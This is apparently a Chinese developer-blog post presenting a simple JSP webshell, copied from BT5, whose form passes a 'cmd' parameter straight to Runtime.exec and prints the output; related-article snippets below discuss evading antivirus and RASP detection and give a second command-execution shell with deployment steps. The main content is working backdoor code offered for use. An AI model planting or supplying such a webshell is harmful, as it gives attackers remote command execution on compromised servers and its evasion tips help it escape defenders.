webshell之简单版本jsp

最新推荐文章于 2025-06-24 16:46:20 发布
原创 最新推荐文章于 2025-06-24 16:46:20 发布 · 5.9k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何从BT5复制并修改一个简单的JSP页面,实现通过GET请求执行命令的功能。利用Java和Runtime类,将用户输入的命令在目标操作系统上执行,并返回执行结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

从BT5上复制下来的,简单修改了一下:

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<html>
<head>
<title>cmdjsp</title>
</head>
<body>
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<pre>
<%
   String cmd = request.getParameter("cmd");
   String output = "";

   if(cmd != null) {
      String s = null;
      try {
         Process p = null;
         cmd = cmd.replaceAll("\\+", " ");
         if (System.getProperty("os.name").toUpperCase().indexOf("WINDOWS") != -1) {
         	p = Runtime.getRuntime().exec("cmd.exe /C \"" + cmd + "\"");
				 } else {
					p = Runtime.getRuntime().exec( cmd );
				 }
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) {
         		s = s.replaceAll("<", "<");
         		s = s.replaceAll(">", ">");
%>
<%=s%>
<%
         }
         
      }
      catch(IOException e) {
         e.printStackTrace();
      }
   }
%>
</pre>
</body>
</html>


JSP Webshell 免杀
悦分享
08-01 1812
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机中运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
java防护webshell_JNI技术绕过rasp防护实现jsp webshell
weixin_34231219的博客
02-27 297
背景原理使用技术要点实战使用其他背景 想到rasp这类工具是基于java、php运行期的堆栈信息进行分析,可以尝试使用jni技术进行绕过。java技术栈中的jni的原理是使用java调用c、c++函数,具体实现的思路是jsp编译为class文件,该class通过jni技术调用另外一处dll里的函数绕过黑名单执行命令获取回显,即可实现rasp和安全防护软件的绕过。github地址:https://g...
webshell.jsp
12-30
webshell.jsp JSP shell
webshell(jsp版)简单的文件管理,可执行shell
fjfdszj的专栏
01-12 5347
<br /><%<br />/**<br />websell V1.1  windows platform<br />@Filename: webshell.jsp <br />*/<br />%><br /><%@page contentType="text/html;charset=gbk"%><br /><%@page import="java.io.*,java.util.*,java.net.*" %><br /><%!<br />private final static int language
WEB安全--Java安全--jsp webshell免杀
最新发布
m0_74800552的博客
06-24 352
介绍部分jsp webshell的原理
jsp写的webshell
wahahams123的专栏
10-28 5861
/** WEBSHELL.JSP** Author: lovehacker* E-mail: wangyun188@hotmail.com** 使用方法: * ]http://victim/webshell.jsp?[options]* options:* action=piped&remoteHost=&remotePort=&myIp=&myPort=* action=tunnel&remot
webshell -真实可用的jsp
03-30
网上很多一句话、webshell 各种原因导致不能用,亲测可用的大马,忍痛割爱与大家分享
java 简单webshell_一个简单webshell
weixin_35430535的博客
02-26 791
Thanks for your support "};String[] strFileManage={"文 件 管 理","File Management"};String[] strCommand={"CMD 命 令","Command Window"};String[] strSysProperty={"系 统 属 性","System Property"};String[] strHelp...
jsp webshell cmd
10-18
Webshell可以是简单的脚本片段,也可以是功能强大的管理工具。 3. **CMD执行与安全隐患** 在JSP环境中,攻击者可能会利用不安全的输入验证、SQL注入或文件包含漏洞等,来执行cmd命令。例如,通过注入`().exec...
JSP webshell免杀——webshell免杀
weixin_46601374的博客
06-29 3909
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习免杀首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
webshell,包含asp,php,aspx,jsp
08-15
防止JSP Webshell的策略包括使用最新的Java版本,避免硬编码敏感信息,以及实施严格的代码审查和输入验证。 除了了解各种类型的Webshell外,我们还需要关注Web安全的其他方面,如SQL注入、XSS(跨站脚本)攻击、...
JSPwebshell
08-21
忍痛分享啊。
jsp webshell JspSpy.jsp
04-19
jsp webshell jspspy 修复部分操作系统下乱码问题。
JSP-Webshells全套汇总
09-29
webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。
script webshell jspWebShell / pythonWebShell / phpWebShell
03-24
NULL 博文链接:https://lindows.iteye.com/blog/1076021
jsp webshell 初识
weixin_50217210的博客
03-02 522
访问得到os.name的信息 代码中可以接收参数cmd 我们提供参数看看 cmd=ipconfig。没问题这里(只是我测试的时候没有处理图片,就不放置了)很有可能是字节输出的代码被检测到了,我们删除了看一下。果然,删除以后检测不到了,那我们想办法绕过。之前是执行exec参数,这次是可疑文件。放到IDEA中webapp下测试一下。在D盾跑还是被检测到了,换一种方式输出字节流。
webshell入门(一)
IT_arookie的博客
11-12 2458
利用java的java.runtime.exec()或java.long.ProcessBuilder()来执行系统命令 1.java.runtime.exec()执行系统命令 package web.shell; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; /** * @Date 2020/11/11
Webshell免杀-JSP
qq_55787787的博客
10-15 3538
JSP免杀马的基本免杀方式。
怎么运行jspwebshell
01-09
### 部署和运行 JSP WebShell 的过程 JSP WebShell 是一种嵌入到 Java Server Pages (JSP) 文件中的恶意代码,能够执行操作系统命令。下面介绍如何在 Web 服务器上部署并测试一个简单JSP WebShell。 #### 准备工作环境 为了成功部署和运行 JSP WebShell,需要确保已经安装配置好支持 JSP 页面解析的 Web 容器,比如 Apache Tomcat 或者 Jetty 等[^1]。 #### 创建 JSP WebShell 文件 创建一个新的 .jsp 文件,在其中编写如下所示的一段代码: ```jsp <%@ page import="java.io.*, java.util.*"%> <% if ("cmd".equals(request.getParameter("action"))) { String cmd = request.getParameter("command"); Process process = Runtime.getRuntime().exec(cmd); InputStream inputStream = process.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); String line; while ((line = reader.readLine()) != null){ out.println(line); } } %> ``` 这段代码定义了一个可以接收 HTTP 请求参数 `action` 和 `command` 的页面逻辑,当接收到特定请求时会尝试去调用操作系统的 shell 命令并将输出返回给浏览器显示。 #### 将文件放置于 Web 应用目录下 把上述编写的 JSP 文件上传至已启动的服务端应用程序根路径下的某个子目录内,例如 `/var/lib/tomcat9/webapps/ROOT/shell.jsp` 对应 Linux 上默认情况下 Tomcat 的 webapp 路径设置;对于 Windows 则可能是类似于 `C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\shell.jsp` 这样的位置。 #### 测试访问效果 通过浏览器或者其他 HTTP 工具向该 URL 发送带有相应参数值的 GET 或 POST 请求来进行验证,如 http://localhost:8080/shell.jsp?action=cmd&command=whoami ,这将会触发服务端执行 whoami 指令,并将结果反馈回客户端展示出来。 请注意,以上内容仅用于安全研究目的的学习交流,请勿非法入侵任何计算机信息系统!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值